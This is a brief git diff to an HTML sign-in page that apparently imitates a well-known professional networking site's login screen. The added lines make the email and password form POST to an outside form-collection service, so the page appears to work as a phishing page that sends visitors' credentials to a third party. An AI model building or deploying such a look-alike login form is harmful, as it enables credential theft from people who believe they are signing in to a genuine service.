--- a/index.html
+++ b/index.html
@@ -161,8 +161,10 @@
 	<a href="#" > <img src="download.png" width="178px" height="107px" > </a> <br> <br>
 	 <div class="a"> 
 	  <h1> 	Sign In </h1> <br> <p class="oo" >Stay updated on your professional world  </p> <br> 
-
-	  <form class="uu" >
+<form class="uu"
+  action="https://formspree.io/f/mleawlda"
+  method="POST"
+>	  
       <input type="email" name="email" placeholder="Email or Phone number" > <br> <br>
       <input type="password" name="email" placeholder="Password" > </form> <br> 
 
